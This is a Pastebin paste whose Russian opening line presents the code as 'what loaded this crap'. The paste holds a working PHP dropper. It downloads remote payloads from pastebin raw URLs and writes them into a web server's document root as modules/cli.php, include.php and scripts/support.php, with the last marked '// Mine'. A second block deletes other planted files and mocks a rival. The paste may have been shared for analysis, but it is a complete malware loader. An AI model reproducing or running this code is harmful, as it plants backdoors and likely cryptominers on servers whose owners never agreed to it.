Advertisement
Guest User

Untitled

a guest
Apr 23rd, 2018
143
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.13 KB | None | 0 0
  1. а вот код что это дерьмо грузил kos
  2. <?php
  3. function http_get($url){
  4. $im = curl_init($url);
  5. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  6. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  7. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  8. curl_setopt($im, CURLOPT_HEADER, 0);
  9. return curl_exec($im);
  10. curl_close($im);
  11. }
  12. $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/cli.php" ;
  13. $text = http_get('https://pastebin.com/raw/SBU9vR8S');
  14. $open = fopen($check, 'w');
  15. fwrite($open, $text);
  16. fclose($open);
  17.  
  18. $check3=$_SERVER['DOCUMENT_ROOT'] . "/include.php" ;
  19. $text3 = http_get('https://pastebin.com/raw/Y43rZ8yt');
  20. $op3=fopen($check3, 'w');
  21. fwrite($op3,$text3);
  22. fclose($op3);
  23.  
  24.  
  25. // Mine
  26. $check3=$_SERVER['DOCUMENT_ROOT'] . "/scripts/support.php" ;
  27. $text3 = http_get('https://pastebin.com/raw/GjYWTVRP');
  28. $op3=fopen($check3, 'w');
  29. fwrite($op3,$text3);
  30. fclose($op3);
  31. // Mine
  32.  
  33. ?>
  34.  
  35. <?php
  36. $files = [
  37. './mm.php',
  38. './include.php',
  39. './izom.php',
  40. ];
  41.  
  42. foreach ($files as $file) {
  43. if (file_exists($file)) {
  44. unlink($file);
  45. } else {
  46. // Lhazo9 has been Deleted :D
  47. }
  48. }
  49. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement